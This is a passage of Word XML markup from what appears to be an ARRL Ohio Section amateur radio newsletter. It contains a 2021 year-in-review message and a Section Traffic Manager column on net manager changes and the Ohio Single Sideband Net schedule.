                                </pic:pic>
                              </a:graphicData>
                            </a:graphic>
                          </wp:inline>
                        </w:drawing>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5CB743" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EF4480" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2021 IN REVIEW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6023E76C" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C71FD10" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>2021 was a better year than 2020 for Amateur Radio. We saw the return of some Hamfests and meetings and new challenges for how we manage our hobby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C063F0F" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ADD9AC" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Our Section Newsletter winner went on win First Place in the Great Lakes contest and we welcomed Tom Sly as our new Section Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4684704E" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D52B7D" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The FCC issued new rules for license fees and testing fees but many clubs and organizations are working to make sure that anyone who wants to be an Amateur Radio operator has the chance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F23B5E" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDC60A2" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>As move towards the New Year COVID numbers are again increasing and I’m sure some new challenges are ahead but we are still on the air, talking and helping communicate wherever and whenever we can.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D741EBC" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACC041D" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Thanks for your hard work and dedication to Amateur Radio and support of the Ohio Section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC6A301" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5268285E" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>73 and Happy New Year!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E1712C" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BF6259" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>John E. Ross</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402CE778" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>ARRL Ohio Section Public Information Coordinator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B8C48F" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>KD8IDJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C594CE1" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="0084211F" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId63" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00160CDC" w:rsidRPr="00160CDC">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>KD8IDJ@ARRL.NET</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38E75703" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>614-459-4292 Home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01F0EC" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>614-266-4292 Cell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B84579D" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7587BB" w14:textId="66D55039" w:rsidR="001E7CE1" w:rsidRDefault="001E7CE1" w:rsidP="00A34760">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A9018E" w14:textId="5A8E5FCE" w:rsidR="001E7CE1" w:rsidRDefault="001E7CE1" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252818432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="159D3959" wp14:editId="7E6CE57A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4533900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>172720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2059305" cy="2656840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="50" name="Picture 50" descr="https://1.bp.blogspot.com/-EG_Xqh_evas/UyuA_kvMxCI/AAAAAAAAAUE/lcfScCkujikdHwKK82BiGsVycw9fAmp2QCPcBGAYYCw/s320/wa3ez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1.bp.blogspot.com/-EG_Xqh_evas/UyuA_kvMxCI/AAAAAAAAAUE/lcfScCkujikdHwKK82BiGsVycw9fAmp2QCPcBGAYYCw/s320/wa3ezn1.jpg">
                      <a:hlinkClick r:id="rId64"/>
                    </pic:cNvPr>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059305" cy="26568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FE4079" w14:textId="0EFC253F" w:rsidR="001D559D" w:rsidRDefault="001D559D" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2D99B4" w14:textId="77777777" w:rsidR="001D559D" w:rsidRDefault="001D559D" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04450AE7" w14:textId="4EC9AC92" w:rsidR="00A34760" w:rsidRPr="001E7CE1" w:rsidRDefault="00A34760" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="stm"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="00A34760">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>From the Section Traffic Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BFF138" w14:textId="51AB1EC6" w:rsidR="00A34760" w:rsidRPr="00FD0EAD" w:rsidRDefault="00A34760" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>David Maynard, WA3EZN – STM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4995DF1D" w14:textId="0866CC40" w:rsidR="00A34760" w:rsidRDefault="0084211F" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidR="00A34760" w:rsidRPr="00992A4C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Calibri"/>
          </w:rPr>
          <w:t>wa3ezn@att.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A34760" w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB65F61" w14:textId="71760BEA" w:rsidR="00A34760" w:rsidRDefault="00A34760" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B3FDA0" w14:textId="77777777" w:rsidR="00A34760" w:rsidRPr="00FD0EAD" w:rsidRDefault="00A34760" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271DAD55" w14:textId="5DE8EBC6" w:rsidR="004A29E6" w:rsidRDefault="004A29E6" w:rsidP="00FD0EAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2516BE7B" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="font870"/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">The Central Ohio Traffic </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="font870"/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Net will </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">have a new net manager starting in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>January, KV8Z Christopher Daniels of Columbus Ohio.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="font870"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="font870"/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Chris was the only nominee to be elected COTN Net managers.  I am glad to have Chis step up to filling the net manager position. I look forward to working with him and getting his reports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74964873" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="446666D4" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="font870"/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">On another note KC8HTP, Frank Brewster has informed me by radiogram that he will no longer be the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Miami Valley Traffic Net, MVTN, manager starting the first of the year. This net serves the Dayton area.  I have received no word as to who will take his place. I have heard nothing more from Frank nor have I been able to find any contact information for him. MVTN is a once a week net in an area where it is hard to find someone to take and/or deliver radiograms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2783A105" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC4F3A9" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>The OSSBN has changed the start time for the evening net.  Do to propagation and the frequency going long the net manager, Mike KC8WH, has asked that if you are bringing traffic to the net that you check in and list you traffic immediately and not wait for the rotational call-up. Often the band goes long by 6:15 so it is necessary to pass the traffic quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C49919" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3233EB" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>OHIO SINGLE SIDEBAND NET</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="612" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="150" w:type="dxa"/>
          <w:left w:w="150" w:type="dxa"/>
          <w:bottom w:w="150" w:type="dxa"/>
          <w:right w:w="150" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2429"/>
        <w:gridCol w:w="1725"/>
        <w:gridCol w:w="1695"/>
        <w:gridCol w:w="2704"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="3DE6B101" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2429" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56FE7E0F" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>Morning session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C36EE6C" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
